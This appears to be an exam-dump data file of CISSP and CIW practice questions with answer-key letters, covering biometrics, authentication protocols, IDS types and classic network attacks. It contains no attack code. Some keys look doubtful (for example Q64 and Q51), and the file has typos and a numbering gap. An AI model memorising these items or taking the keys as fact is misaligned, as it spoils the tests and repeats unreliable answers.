A#CISSP4 Q.171:  Signature identification systems analyze what areas of an individual's signature?  	^A: All of the choices EXCEPT the signing rate.	^B: The specific features of the signature.	^C: The specific features of the process of signing one's signature.	^D: The signature rate.
A#CISSP4 Q.172:  What are the advantages to using voice identification?	^A: All of the choices.	^B: Timesaving	^C: Reliability	^D: Flexibility
B#CISSP4 Q.173:  What are the methods used in the process of facial identification?  	^A: None of the choices.	^B: Detection and recognition.	^C: Scanning and recognition.	^D: Detection and scanning.
A#CISSP4 Q.174:  In the process of facial identification, the basic underlying recognition technology of facial identification involves:  	^A: Eigenfeatures of eigenfaces.	^B: Scanning and recognition.	^C: Detection and scanning.	^D: None of the choices.
C#CISSP4 Q.175:  Which of the following is a facial feature identification product that can employ artificial intelligence and can require the system to learn from experience?  	^A: All of the choices.	^B: Digital nervous system.	^C: Neural networking	^D: DSV
B#CISSP4 Q.176:  What is typically used to illustrate the comparative strengths and weaknesses of each biometric technology?  	^A: Decipher Chart	^B: Zephyr Chart	^C: Cipher Chart	^D: Zapper Chart
B#CISSP4 Q.177:  In terms of the order of effectiveness, which of the following technologies is the most effective?  	^A: Fingerprint	^B: Iris scan	^C: Keystroke pattern	^D: Retina scan
B#CISSP4 Q.178:  In terms of the order of effectiveness, which of the following technologies is the least effective?  	^A: Voice pattern	^B: Signature	^C: Keystroke pattern	^D: Hand geometry
C#CISSP4 Q.179:  In terms of the order of acceptance, which of the following technologies is the MOST accepted?  	^A: Hand geometry	^B: Keystroke pattern	^C: Voice Pattern	^D: Signature
D#CISSP4 Q.180:  In terms of the order of acceptance, which of the following technologies is the LEAST accepted?  	^A: Fingerprint	^B: Iris	^C: Handprint	^D: Retina patterns
C#CISSP4 Q.181:  Token, as a way to identify user, is subject to what type of error?  	^A: Token error	^B: Decrypt error	^C: Human error	^D: Encrypt error
C#CISSP4 Q.182:  Which of the following factors may render a token based solution unusable?  	^A: Token length	^B: Card size	^C: Battery lifespan	^D: None of the choices.
D#CISSP4 Q.183:  Memory only card works based on:  	^A: Something you have.	^B: Something you know.	^C: None of the choices.	^D: Something you know and something you have.
D#CISSP4 Q.184:  Which of the following is a disadvantage of memory only card?  ^A: High cost to develop.	^B: High cost to operate.	^C: Physically infeasible.	^D: Easy to counterfeit.
D#CISSP4 Q.185:  The word smart card has meanings of:  	^A: Personal identity token containing IC-s.	^B: Processor IC card.	^C: IC card with ISO 7816 interface.	^D: All of the choices.
C#CISSP4 Q.186:  Processor card contains which of the following components?  	^A: Memory and hard drive.	^B: Memory and flash.	^C: Memory and processor.	^D: Cache and processor.
D#CISSP4 Q.187:  Attacks on smartcards generally fall into what categories?  	^A: Physical attacks.	^B: Trojan Horse attacks.	^C: Logical attacks.	^D: All of the choices, plus Social Engineering attacks.
B#CISSP4 Q.188:  What type of attacks occurs when a smartcard is operating under normal physical conditions, but sensitive information is gained by examining the bytes going to and from the smartcard?  ^A: Physical attacks.	^B: Logical attacks.	^C: Trojan Horse attacks.	^D: Social Engineering attacks.
A#CISSP4 Q.189:  What type of attacks occurs when normal physical conditions are altered in order to gain access to sensitive information on the smartcard?  	^A: Physical attacks	^B: Logical attacks	^C: Trojan Horse attacks	^D: Social Engineering attacks
C#CISSP4 Q.190:  What type of attacks occurs when a rogue application has been planted on an unsuspecting user's workstation?	^A: Physical attacks	^B: Logical attacks	^C: Trojan Horse attacks	^D: Social Engineering attacks
A#CISSP4 Q.191:  What is an effective countermeasure against Trojan horse attack that targets smart cards?  	^A: Single-access device driver architecture.	^B: Handprint driver architecture.	^C: Fingerprint driver architecture.	^D: All of the choices.
C#CISSP4 Q.192:  Which of the following attacks could be the most successful when the security technology is properly implemented and configured?  	^A: Logical attacks	^B: Physical attacks	^C: Social Engineering attacks	^D: Trojan Horse attacks
A#CISSP4 Q.193:  What are the valid types of one time password generator?  	^A: All of the choices.	^B: Transaction synchronous	^C: Synchronous/PIN synchronous	^D: Asynchronous/PIN asynchronous
A#CISSP4 Q.194:  What are the benefits of job rotation?  	^A: All of the choices.	^B: Trained backup in case of emergencies.	^C: Protect against fraud.	^D: Cross training to employees.
A#CISSP4 Q.195:  In order to avoid mishandling of media or information, you should consider to use:  	^A: Labeling	^B: Token	^C: Ticket	^D: SLL
A#CISSP4 Q.196:  In order to avoid mishandling of media or information, which of the following should be labeled?  	^A: All of the choices.	^B: Printed copies	^C: Tape	^D: Floppy disks
C#CISSP4 Q.197:  A method for a user to identify and present credentials only once to a system is known as:  	^A: SEC	^B: IPSec	^C: SSO	^D: SSL
A#CISSP4 Q.198:  Which of the following correctly describe the features of SSO?  	^A: More efficient log-on.	^B: More costly to administer.	^C: More costly to setup.	^D: More key exchanging involved.
B#CISSP4 Q.199:  What is a protocol used for carrying authentication, authorization, and configuration information between a Network Access Server and a shared Authentication Server?  	^A: IPSec	^B: RADIUS	^C: L2TP	^D: PPTP
C#CISSP4 Q.200:  RADIUS is defined by which RFC?  	^A: 2168	^B: 2148	^C: 2138	^D: 2158
A#CISSP4 Q.201:  In a RADIUS architecture, which of the following acts as a client?	^A: A network Access Server.	^B: None of the choices.	^C: The end user.	^D: The authentication server.
C#CISSP4 Q.202:  In a RADIUS architecture, which of the following can act as a proxy client?  	^A: The end user.	^B: A Network Access Server.	^C: The RADIUS authentication server.	^D: None of the choices.
D#CISSP4 Q.203:  What protocol was UDP based and mainly intended to provide validation of dial up user login passwords?  	^A: PPTP	^B: L2TP	^C: IPSec	^D: TACACS
C#CISSP4 Q.204:  Which of the following are proprietarily implemented by CISCO?  	^A: RADIUS+	^B: TACACS	^C: XTACACS and TACACS+	^D: RADIUS
B#CISSP4 Q.205:  In Unix, which file is required for you to set up an environment such that every user on the other host is a trusted user that can log into this host without authentication?  	^A: /etc/shadow	^B: /etc/host.equiv	^C: /etc/passwd	^D: None of the choices.
D#CISSP4 Q.206:  Information security is the protection of data. Information will be protected mainly based on:	^A: Its sensitivity to the company.	^B: Its confidentiality.	^C: Its value.	^D: All of the choices.
B#CISSP4 Q.207:  Which of the following actions can increase the cost of an exhaustive attack?  	^A: Increase the age of a password.	^B: Increase the length of a password.	^C: None of the choices.	^D: Increase the history of a password.
B#CISSP4 Q.208:  Which of the following actions can make a cryptographic key more resistant to an exhaustive attack?  	^A: None of the choices.	^B: Increase the length of a key.	^C: Increase the age of a key.	^D: Increase the history of a key.
D#CISSP4 Q.209:  What attack involves actions to mimic one's identity?  	^A: Brute force	^B: Exhaustive	^C: Social engineering	^D: Spoofing
C#CISSP4 Q.210:  What attack takes advantage of operating system buffer overflows?  	^A: Spoofing	^B: Brute force	^C: DoS	^D: Exhaustive
C#CISSP4 Q.211:  What attack is primarily based on the fragmentation implementation of IP and large ICMP packet size? 	^A: Exhaustive	^B: Brute force	^C: Ping of Death	^D: Spoofing
C#CISSP4 Q.212:  Land attack attacks a target by:  	^A: Producing large volume of ICMP echos.	^B: Producing fragmented IP packets.	^C: Attacking an established TCP connection.	^D: None of the choices.
A#CISSP4 Q.213:  What attack is primarily based on the fragmentation implementation of IP?  	^A: Teardrop	^B: Exhaustive	^C: Spoofing	^D: Brute force
D#CISSP4 Q.214:  What attack floods networks with broadcast traffic so that the network is congested?  	^A: Spoofing	^B: Teardrop	^C: Brute force	^D: SMURF
D#CISSP4 Q.215:  What attack involves repeatedly sending identical e-message to a particular address?  	^A: SMURF	^B: Brute force	^C: Teardrop	^D: Spamming
D#CISSP4 Q.216:  Which of the following attacks focus on cracking passwords?	^A: SMURF	^B: Spamming	^C: Teardrop	^D: Dictionary
D#CISSP4 Q.217:  Man-in-the-middle attack is a real threat to what type of communication?  	^A: Communication based on random challenge.	^B: Communication based on face to face contact.	^C: Communication based on token.	^D: Communication based on asymmetric encryption.
B#CISSP4 Q.218:  Which of the following will you consider as a program that monitors data traveling over a network?  	^A: Smurfer	^B: Sniffer	^C: Fragmenter	^D: Spoofer
A#CISSP4 Q.219:  Individuals who have their sole aim as breaking into a computer system are being referred to as:  	^A: Crackers	^B: Sniffers	^C: Hackers	^D: None of the choices.
A#CISSP4 Q.220:  What technology is being used to detect anomalies?  	^A: IDS	^B: FRR	^C: Sniffing	^D: Capturing
C#CISSP4 Q.221:  IDSs verify, itemize, and characterize threats from:  	^A: Inside your organization's network.	^B: Outside your organization's network.	^C: Outside and inside your organization's network.	^D: The Internet.
D#CISSP4 Q.222:  IDS can be described in terms of what fundamental functional components?  	^A: Response	^B: Information Sources	^C: Analysis	^D: All of the choices.
D#CISSP4 Q.223:  What are the primary goals of intrusion detection systems?  	^A: Accountability	^B: Availability	^C: Response	^D: All of the choices
A#CISSP4 Q.224:  What is the most common way to classify IDSs?  	^A: Group them by information source.	^B: Group them by network packets.	^C: Group them by attackers.	^D: Group them by signs of intrusion.
B#CISSP4 Q.225:  The majority of commercial intrusion detection systems are:  	^A: Identity-based	^B: Network-based	^C: Host-based	^D: Signature-based
A#CISSP4 Q.226:  Which of the following is a drawback of Network-based IDSs?  	^A: It cannot analyze encrypted information.	^B: It is very costly to setup.	^C: It is very costly to manage.	^D: It is not effective.
A#CISSP4 Q.227:  Host-based IDSs normally utilize information from which of the following sources?  	^A: Operating system audit trails and system logs.	^B: Operating system audit trails and network packets.	^C: Network packets and system logs.	^D: Operating system alarms and system logs.
A#CISSP4 Q.228:  When comparing host based IDS with network based IDS, which of the following is an obvious advantage?  	^A: It is unaffected by switched networks.	^B: It cannot analyze encrypted information.	^C: It is not costly to setup.	^D: It is not costly to manage.
D#CISSP4 Q.229:  You are comparing host based IDS with network based IDS. Which of the following will you consider as an obvious disadvantage of host based IDS?  	^A: It cannot analyze encrypted information.	^B: It is costly to remove.	^C: It is affected by switched networks.	^D: It is costly to manage.
B#CISSP4 Q.230:  Which of the following IDS inflict a higher performance cost on the monitored systems?  	^A: Encryption based	^B: Host based	^C: Network based	^D: Trusted based
D#CISSP4 Q.231:  Application-based IDSs normally utilize information from which of the following sources?  	^A: Network packets and system logs.	^B: Operating system audit trails and network packets.	^C: Operating system audit trails and system logs.	^D: Applications transaction log files.
A#CISSP4 Q.232:  What are the primary approaches IDS takes to analyze events to detect attacks?  	^A: Misuse detection and anomaly detection.	^B: Log detection and anomaly detection.	^C: Misuse detection and early drop detection.	^D: Scan detection and anomaly detection.
B#CISSP4 Q.233:  Misuse detectors analyze system activity and identify patterns. The patterns corresponding to known attacks are called:  	^A: Attachments	^B: Signatures	^C: Strings	^D: Identifications
C#CISSP4 Q.234:  Which of the following is an obvious disadvantage of deploying misuse detectors?  	^A: They are costly to setup.	^B: They are not accurate.	^C: They must be constantly updated with signatures of new attacks.	^D: They are costly to use.
C#CISSP4 Q.235:  What detectors identify abnormal unusual behavior on a host or network?  	^A: None of the choices.	^B: Legitimate detectors.	^C: Anomaly detectors.	^D: Normal detectors.
D#CISSP4 Q.236:  Which of the following are the major categories of IDSs response options?  	^A: Active responses	^B: Passive responses	^C: Hybrid	^D: All of the choices.
A#CISSP4 Q.237:  Alarms and notifications are generated by IDSs to inform users when attacks are detected. The most common form of alarm is:  	^A: Onscreen alert	^B: Email	^C: Pager	^D: Icq
A#CISSP4 Q.238:  Which of the following is a valid tool that complements IDSs?  ^A: All of the choices.	^B: Padded Cells	^C: Vulnerability Analysis Systems	^D: Honey Pots
B#CISSP4 Q.239:  What tool do you use to determine whether a host is vulnerable to known attacks?  	^A: Padded Cells	^B: Vulnerability analysis	^C: Honey Pots	^D: IDS
A#CISSP4 Q.240:  What tool is being used to determine whether attackers have altered system files or executables?  	^A: File Integrity Checker	^B: Vulnerability Analysis Systems	^C: Honey Pots	^D: Padded Cells
A#CISSP4 Q.241:  What is known as decoy system designed to lure a potential attacker away from critical systems?	^A: Honey Pots	^B: Vulnerability Analysis Systems	^C: File Integrity Checker	^D: Padded Cells
B#CISSP4 Q.242:  When the IDS detects attackers, the attackers are seamlessly transferred to a special host. This method is called:  	^A: Vulnerability Analysis Systems	^B: Padded Cell	^C: Honey Pot	^D: File Integrity Checker
D#CISSP4 Q.243:  Most computer attacks result in violation of which of the following security properties?  	^A: Availability	^B: Confidentiality	^C: Integrity and control	^D: All of the choices.
D#CISSP4 Q.244:  What types of computer attacks are most commonly reported by IDSs?	^A: System penetration	^B: Denial of service	^C: System scanning	^D: All of the choices
D#CISSP4 Q.245:  What attack is typically used for identifying the topology of the target network?	^A: Spoofing	^B: Brute force	^C: Teardrop	^D: Scanning
B#CIW Q1. Why is password lockout an effective deterrent to cracking attempts?	^A: Passwords cannot be changed through brute-force methods	^B: A limited number of login attempts before lockout reduces the number of guesses the potential cracker can make	^C: Passwords protected in this manner are impossible to find because they are locked out of the main flow of information on the WAN	^D: Password lockout provides no real improvement over traditional locking methods.
B#CIW Q2. Which of the following choices best defines the Windows NT security account manager?	^A: It is the portion of the GINA DLL that controls security	^B: It is the database containing the identity of the users and their credentials	^C: It is the name of the machine responsible for the management of all the security of the LAN	^D: It is the interface that is responsible for logging on and user IDs
A#CIW Q3. Under the level C2 security classification, what does discretionary access control mean?	^A: Discretionary access control means that the owner of a resource must be able to use that resource	^B: Discretionary access control is the ability of the system administrator to limit the time any user spends on a computer	^C: Discretionary access control is a policy that limits the use of any resource to a group or a security profile	^D: Discretionary access control is a rule set by the security auditor to prevent others from downloading unauthorized scripts or programs.
B#CIW Q4. Michel wants to write a computer virus that will cripple UNIX systems. What is going to be the main obstacle preventing him from success?	^A: UNIX computers are extremely difficult to access illicitly over the internet, and therefore computer viruses are not an issue with UNIX systems	^B: Due to the file permission structure and the number of variations in the UNIX hardware architectures, a virus would have to gain root privileges as well as identify the hardware and UNIX flavor in use.	^C: Due to availability of effective free anti-virus tools, computer viruses are caught early and often. Michel's virus would have to evade detection for it to succeed.	^D: Due to the extensive use of ANSI C in the programming of UNIX, the virus would have to mimic some of the source code used in the infected iteration of the UNIX operating system
B#CIW Q5. Which of the following best describes the problem with share permissions and share points in Windows NT?	^A: Share points must be the same value as the directory that serves the share point	^B: Share points contain permissions; and any file under the share point must possess the same permissions	^C: Share permissions are exclusive to root directories and files; they do not involve share points, which define user permissions	^D: Share points are set when connection is established, therefore the static nature of file permissions can conflict with share points if they are not set with read and write permissions for everyone.
A#CIW Q6. What do the discretionary ACL (access control list) and the system ACL in Windows NT have in common?	^A: Both share properties for storing secure object identifiers	^B: Both can grant or deny permissions to parts of the system	^C: Both are installed by default on the system in different sections of the client/server model	^D: Both are responsible for creation of the master access control list
A#CIW Q7. Winlogon loads the GINA DLL. What does the GINA DLL then do?	^A: It provides the interface for processing logon requests	^B: It creates the link to the user database for the update of the local security authority	^C: It creates the link to the master access list on the server	^D: It checks the user database for correct date/time stamps of last modification
C#CIW Q8. You must apply permissions to a file named /home/myname/myfile.txt, and you need to fulfill the following requirements:^  You want full access to the file.^  People in your group should be able to read the file.^  People in your group should not be able to write the file.^  People outside of your group should be denied access to the file.^  What are the most secure permissions you would apply to the file?	^A. Chage 700 /home/myname/myfile.txt	^B. Chage 744 /home/myname/myfile.txt	^C. Chmod 640 /home/myname/myfile.txt	^D. Chmod 064 /home/myname/myfile.txt
A#CIW Q10. What are the security issues that arise in the use of the NFS (Network File System)?	^A: Synchronization of user and group IDs is poor, so it is easy to spoof trusted hosts and user names.	^B: The lack of logging in one place or on one machine, and the multiple logs this then requires, can create bottlenecks	^C: The possibility arises for Cleartext passwords to be sniffed on the network if it does not use Secure RPC.	^D: NFS uses a weak authentication scheme and transfers information in encrypted form
B#CIW Q11. What is the major security issue with standard NIS (Network Information System)?	^A: It is impossible to enforce a centralized login scheme	^B: NIS provides no authentication requirement in its native state	^C: There is no way to encrypt data being transferred	^D: NIS is a legacy service and, as such, is only used in older, less secure operating systems and networks
B#CIW Q12. In a Linux system, how do you stop the POP3, IMAPD, and FTP services?	^A: By changing the permissions on the configuration file that controls the service (/sbin/inetd), then recompiling /etc/inetd.config	^B: By commenting out the service using the # symbol in the text file /etc/inetd.conf, then restarting the inetd daemon	^C: By recompiling the system kernel, making sure you have disabled that service	^D: By commenting out the service using the $ symbol in the text file /etc/inetd.conf, then restarting the inetd daemon.
A#CIW Q13. Which of the following choices lists the ports that Microsoft internal networking uses that should be blocked from outside access?	^A: UDP 137 and 138, and TCP 139	^B: Ports 11, 112, and 79	^C: UDP 1028, 31337 and 6000	^D: Port 80, 134 and 31337
A#CIW Q14. What is the best way to keep employees on a LAN from unauthorized activity or other mischief?	^A: Reduce each user's permissions to the minimum needed to perform the tasks required by his or her job	^B: Limit the number of logins available to all users to one at a time	^C: Limit the number of files that any one user can have open at any given time	^D: Implement a zero-tolerance policy in regard to employees who load games or other unauthorized software on the company's computers
C#CIW Q15. What is a spoofing attack?	^A: A hacker pretends to be the superuser and spoofs a user into allowing him into the system	^B: A hacker calls a user and pretends to be a system administrator in order to get the user's password	^C: A computer (or network) pretends to be a trusted host (or network)	^D: A hacker gains entrance to the building where the network resides and accesses the system by pretending to be an employee
B#CIW Q16. Abjee is going to log on to his network. His network does not employ traffic padding mechanisms. Why will it be easy for someone to steal his password?	^A: Because his password could be more than two weeks old	^B: Because of the predictability of the length of the login and password prompts	^C: Because the Cleartext user name and password are not encrypted	^D: Because there is no provision for log analysis without traffic padding, thus no accountability when passwords are lost
D#CIW Q17. In a typical corporate environment, which of the following resources demands the highest level of security on the network?	^A: Purchasing	^B: Engineering	^C: Sales	^D: Accounting
A#CIW Q18. Luke is documenting all of his network attributes. He wants to know the type of network-level information that is represented by the locations of access panels, wiring closets and server rooms. Which of the following is the correct term for this activity?	^A: Network mapping	^B: IP service routing	^C: Router and switch designing	^D: War dialing
D#CIW Q19. Which service, command or tool allows a remote user to interface with a system as if he were sitting at the terminal?	^A: Host	^B: Finger	^C: SetRequest	^D: Telnet
C#CIW Q20. Which command, tool or service on a UNIX network converts names to IP addresses and IP addresses to names, and can also specify which servers are mail servers?	^A: Port scanner	^B: Traceroute	^C: Host	^D: Nslookup
B#CIW Q21. Kerstin connected to an e-commerce site and bought a new mouse pad with her credit card for $5.00 plus shipping and handling. She never received her mouse pad so she called her credit card company to cancel the transaction. She was not charged for the mouse pad, but she received multiple charges she knew nothing about. She tried to connect to the site again but could not find it. Which type of hacking attack occurred?	^A: Denial-of-service attack	^B: Hijacking attack	^C: Illicit server attack	^D: Spoofing attack
B#CIW Q22. Which service, tool or command allows a remote or local user to learn the directories or files that are accessible on the network?	^A: Traceroute	^B: Share scanner	^C: Port scanner	^D: Ping scanner
D#CIW Q23. Which type of attack utilizes an unauthorized service or daemon running on your system to send out information to a hacker that can be used to further compromise the system?	^A: Virus attack	^B: Hijacking attack	^C: Man-in-the-middle attack	^D: Illicit server attack
D#CIW Q24. Which type of attack uses a simple or complex program that self-replicates and/or deposits a payload on a remote or local computer?	^A: Dictionary attack	^B: Hijacking attack	^C: Illicit server attack	^D: Virus attack
A#CIW Q25. Which type of attack can use a worm or packet sniffer to crash systems, causing low resources and/or consuming bandwidth?	^A: Denial-of-service attack	^B: Illicit server attack	^C: Man-in-the-middle attack	^D: Virus attack
C#CIW Q26. Which service, command or tool discovers the IP addresses of all computers or routers between two computers on an internet/intranet network?	^A: Whois	^B: Port scanner	^C: Traceroute	^D: Nslookup
D#CIW Q27. Which tool, service or command will enable you to learn the entire address range used by an organization or company?	^A: Traceroute	^B: Nslookup	^C: Port scanner	^D: Ping scanner
A#CIW Q28. What is the final step in assessing the risk of network intrusion from an internal or external source?	^A: Using the existing management and control architecture	^B: Evaluating the existing perimeter and internal security	^C: Analyzing, categorizing and prioritizing resources	^D: Considering the business concerns
B#CIW Q29. A file is replaced by another file that provides the same service but also has a secret operation that is meant to subvert security. What is this type of attack called?	^A: A buffer overflow attack	^B: A Trojan attack	^C: A denial-of-service attack	^D: An illicit server attack
B#CIW Q30. Most hackers run two services first to learn information about a computer or Windows server attached to the Internet or intranet. These services enable hackers to find weaknesses in order to infiltrate the computer or network. Which one of the following choices lists the two services?	^A: Ping and traceroute	^B: Nslookup and whois	^C: Whois and ping	^D: Nslookup and traceroute
A#CIW Q31. What common target can be reconfigured to disable an interface and provide inaccurate IP addresses over the Internet?	^A: Routers	^B: E-mail servers	^C: DNS servers	^D: Databases
B#CIW Q32. Lucy obtains the latest stable versions of server, services or applications. Which type of attack does this action help to prevent?	^A: Dictionary attack	^B: Buffer overflow attack	^C: Trojan attack	^D: Illicit server attack
A#CIW Q33. What host-level information would you want to obtain so you can exploit defaults and patches?	^A: Servers	^B: Routers and switches	^C: Databases	^D: Firewall types
D#CIW Q34. Which of the following is a way to get around a firewall to intrude into a secure network from a remote location?	^A: IP services	^B: Active ports	^C: Identified network topology	^D: Modem banks
D#CIW Q35. You notice that your FTP service reveals unnecessary information about your server. Which of the following is the most efficient solution to this problem?	^A: Filter out the login banner using a packet filter	^B: Disable the service in question	^C: Place the service behind the firewall	^D: Disable the login banner for the service
C#CIW Q36. What is the most common security problem on a client/server network?	^A: Outdated software	^B: Old login accounts	^C: Non-secured ports	^D: Browser flaws
C#CIW Q37. While assessing the risk of a network, which step are you conducting when you determine whether the network can differentiate itself from other networks?	^A: Considering the business concerns	^B: Analyzing, categorizing and prioritizing resources	^C: Evaluating the existing perimeter and internal security	^D: Using the existing management and control architecture
A#CIW Q38. Which type of attack occurs when a hacker obtains passwords and other information from legitimate transactions?	^A: Man-in-the-middle attack	^B: Denial-of-service attack	^C: Dictionary attack	^D: Illicit server attack
D#CIW Q39. Which of the following layers of TCP/IP stacks is the most difficult to secure?	^A: Physical	^B: Network	^C: Transport	^D: Application
B#CIW Q40. Kerstin wants to improve the security on her FTP server. She is worried about password-sniffing attacks. Which of the following is the best action for her to take?	^A: Disable anonymous logins	^B: Allow only anonymous logins	^C: Configure the firewall to block port 21	^D: Place the FTP server outside of the firewall
D#CIW Q41. What is the primary security problem with FTP?	^A: Anonymous logins do not require a password	^B: Damaging programs can be executed on the client	^C: Damaging programs can be executed on the server	^D: The login name and password are sent to the server in cleartext
A#CIW Q42. Which type of port is used by a client when it establishes a TCP connection?	^A: Ephemeral	^B: Well-known	^C: Reserved	^D: Static
B#CIW Q43. Which system provides relay services between two devices?	^A: Proxy server	^B: Gateway	^C: VPN	^D: Screening router
A#CIW Q44. Which port does FTP use for a control connection?	^A: 21	^B: 25	^C: 53	^D: 162
C#CIW Q45. Which port is used by DNS when conducting zone transfers?	^A: UDP port 53	^B: UDP port 23	^C: TCP port 53	^D: TCP port 23
D#CIW Q46. What is the primary security risk in SNMP?	^A: Login names and passwords are not encrypted	^B: Damaging programs can be executed on the client	^C: Damaging programs can be executed on the server	^D: Passwords and data are transferred in cleartext
B#CIW Q47. Ulf wants to ensure that a hacker cannot access his DNS zone files. What is the best action for him to take?	^A: Filter TCP port 23	^B: Configure the firewall to block zone transfers and accept zone transfer requests only from specific hosts	^C: Configure all routers to block zone transfers and encrypt zone transfer messages	^D: Disable Nslookup
D#CIW Q48. What is a Windows NT equivalent to a UNIX daemon?	^A: A thread	^B: A process	^C: A protocol	^D: A service
A#CIW Q49. Which of the following is the correct order of events in the termination of a TCP/IP connection?	^A: Active close, passive close, FIN, ACK	^B: Passive close, Active close, FIN, ACK	^C: Active close, passive close, ACK, FIN	^D: Passive close, active close, ACK, FIN
B#CIW Q50. Which protocol is normally used to communicate errors or other conditions at the IP layer, but has also been used to conduct denial-of-service attacks?	^A: TCP	^B: ICMP	^C: SNMP	^D: UDP
D#CIW Q51. Which of the following will help control unauthorized access to an e-mail server?	^A: Disable CGI scripts	^B: Prohibit relaying	^C: Limit the number of e-mail messages a given account can receive in a day	^D: Scan all e-mail messages at the firewall or SMTP server 
D#CIW Q52. What is the correct order of events in the establishment of a TCP/IP connection?	^A: Passive open, active open, ACK	^B: Passive open, ACK, active open	^C: Active open, active open, ACK	^D: Active open, passive open, ACK
B#CIW Q53. You are using a packet sniffer to capture transmissions between two remote systems. However, you find that you can only capture packets between your own system and another. What is the problem?	^A: You have configured your filter incorrectly	^B: You are sniffing packets in a switched network	^C: Tcpdump captures packets only between your host and another host	^D: Your system does not have its default gateway configured
D#CIW Q54. How might a hacker cause a denial-of-service attack on an FTP server?	^A: By executing a damaging program on the server	^B: By initiating an ICMP flood	^C: By initiating a broadcast storm	^D: By filling the server's hard drive to capacity
B#CIW Q55. Which type of port is used by HTTP for the control connection?	^A: Ephemeral	^B: Well-known	^C: Dynamic	^D: UDP
C#CIW Q56. Which security feature does NNTP possess that SMTP does not?	^A: Dynamic port assignment	^B: Separate control and data ports	^C: Usable in conjunction with SSL	^D: Strict bounds checking on arrays
C#CIW Q57. Laura is a system administrator who wants to block all NNTP traffic between her network and the Internet. How should she configure her firewall?	^A: Disable anonymous logins in the NNTP configuration manager	^B: Configure all routers to block broadcast packets	^C: Configure the firewall to block port 119	^D: Configure the firewall to block port 25
A#CIW Q58. Luke must advise his users about which client to employ when accessing remote systems. Which of the following is a connection-oriented protocol that can contain unencrypted password information from Telnet sessions?	^A: TCP	^B: TTP	^C: HTTP	^D: UDP
B#CIW Q59. What is the term for the process of replacing source IP addresses with false IP addresses?	^A: Hijacking	^B: Spoofing	^C: Spamming	^D: Brute force
A#CIW Q60. Which ports are used by SNMP?	^A: UDP ports 161 and 162	^B: UDP ports 20 and 21	^C: TCP ports 161 and 162	^D: TCP ports 20 and 21
A#CIW Q61. What is the most common type of network attack?	^A: Denial-of-service attacks, because they are easy to perpetrate	^B: Insider attacks, because most resources are spent defending against outside attacks	^C: Packet sniffing and other benign attacks, because there is no way to defend against them	^D: Brute-force password attacks, because most users do not employ good passwords
B#CIW Q62. What is the difference between digital signature mechanisms and simple encryption?	^A: Digital signatures are generally 128-bit encryption, whereas simple encryption is generally 56 bits	^B: Digital signatures are verified by third parties that vouch for the veracity of the sender and the contents	^C: Digital signatures carry timestamps, whereas standard encryption does not	^D: Standard encryption mechanisms have no provision for traffic padding to thwart password sniffers
A#CIW Q63. What is problematic about a new NTFS partition?	^A: The everyone group has unrestricted access permissions on the new partition, thus restricting access to the new partition becomes problematic.	^B: NTFS cannot read user/group permissions tables on FAT systems, thus the group permissions file must be kept in the same file format as the new partition	^C: The admin group has exclusive access to the new partition, thus getting client machines to see the new partitions can be problematic	^D: NTFS allows only the root user to access it, thus it is difficult to divide the new partition
A#CIW Q64. Why is the rlogin command dangerous to network security?	^A: Remote logins are a security threat regardless of the protocol and should be avoided	^B: There is no way to prevent the user who successfully uses rlogin from becoming root	^C: The rlogin command has a long history of buffer overflows that has not been corrected	^D: If one system that has extensive rlogin privileges to other systems is compromised, then a hacker can spread throughout the entire network
C#CIW Q65. Which of the following choices lists the components that make up security descriptions for Windows NT objects?	^A: The user name, the password and the object-owner security identifier	^B: The UNAME the access profile of the object-owner SID, and confirmation by the system access control list	^C: The object-owner SID, the discretionary access control, the DACL, and the group SID	^D: The user name, the object identifiers, the set user identifier, and the time/date stamp
B#CIW Q66. What is the major security problem with the SUID/SGID programs or utilities?	^A: The root account must be in order to utilize programs set this way	^B: These permissions in a program can temporarily grant root privileges to anyone	^C: SUID programs are not removed immediately from the swap/paging area, which results in a clear security risk	^D: The SGID is a clear violation of good security practice and is only used as a result of the SUID
A#CIW Q67. Carol wants to choose a strong password for her computer. Which of the following should she include in her password?	^A: A mixture of uppercase and lowercase letters, symbols and numbers	^B: An arcane phrase only she can remember	^C: An incorrect spelling of a word or a phrase	^D: A mixture of random words that form nonsense
B#CIW Q68. Why would Ulf refuse to run the command chmod -R 777 /home/ulf?	^A: The command will copy all his files to a public directory	^B: The command will allow everyone to read, write and execute all files in his directory	^C: The command will create problems when his profile file initialises his user settings	^D: The command is known to have security breaches associated with it, and should be avoided.
C#CIW Q69. Which command, service or tool allows you to imitate a secondary DNS server in order to obtain its records via a zone transfer?	^A: Traceroute	^B: Ping scanner	^C: Nslookup	^D: Host
C#CIW Q70. Which type of attack uses a database or databases to guess a password in order to gain access to a computer system?	^A: Hijacking attack	^B: Virus attack	^C: Dictionary attack	^D: Man-in-the-middle attack
A#CIW Q71. What is the name of the risk assessment stage in which you bypass login accounts and passwords?^A: Penetration	^B: Control	^C: Activation	^D: Discovery
D#CIW Q72. Which tool, command or service allows a remote or local user to find any open connection paths to the system on the Internet or an intranet?	^A: Traceroute	^B: Whois	^C: Nslookup	^D: Port scanner
B#CIW Q73. A hacker has just changed the information for a zone during a zone transfer. This attack caused false information to be passed on to network hosts as if it were legitimate. Which type of server is the target in such an attack?	^A: An e-mail server	^B: A DNS server	^C: A router	^D: A FTP server
C#CIW Q74. Which of the following do hackers target because it usually communicates in Cleartext?	^A: Router	^B: DNS server	^C: FTP server	^D: E-mail server
B#CIW Q75. Which directory holds the Microsoft NT operating system on an NT 4.0 server (using default installation)?	^A: \windows	^B: \winnt	^C: \winnt4.0	^D: \program files
C#CIW Q76. Where are most of the binaries located on the hard drive of a UNIX server (using default installation)?	^A: /bin	^B: /sbin	^C: /usr	^D: /proc
A#CIW Q77. Ulf is a systems administrator. He sees that an attacker from a remote location is sending invalid packets, trying to monopolize Ulf's connection so that a denial of service occurs. What characteristic of the activity makes Ulf think this is a denial-of-service attack?	^A: Bandwidth consumption	^B: Hijacking of internal user resources	^C: Polling	^D: Use of an illicit server
B#CIW Q78. Which application is used to learn about an operating system's type and patch level?^A: Traceroute	^B: Nmap	^C: Whois	^D: Ping
D#CIW Q79. You have installed a proxy server that authenticates users. However, you find that one user has bypassed the proxy server by entering the default gateway IP address. How can you solve this problem?	^A: Configure the default gateway to deny access to all systems	^B: Confront the user	^C: Reconfigure the user's machine	^D: Configure the default gateway to reject all requests to all systems except for the proxy server
B#CIW Q80. What is the standard method for securing individual e-mail messages sent between a company and other users that do not use that e-mail server?	^A: Invoke encryption at the e-mail server	^B: Invoke encryption on each client	^C: Filter firewall port 42 on the company firewall	^D: Store all e-mail messages on a separate partition
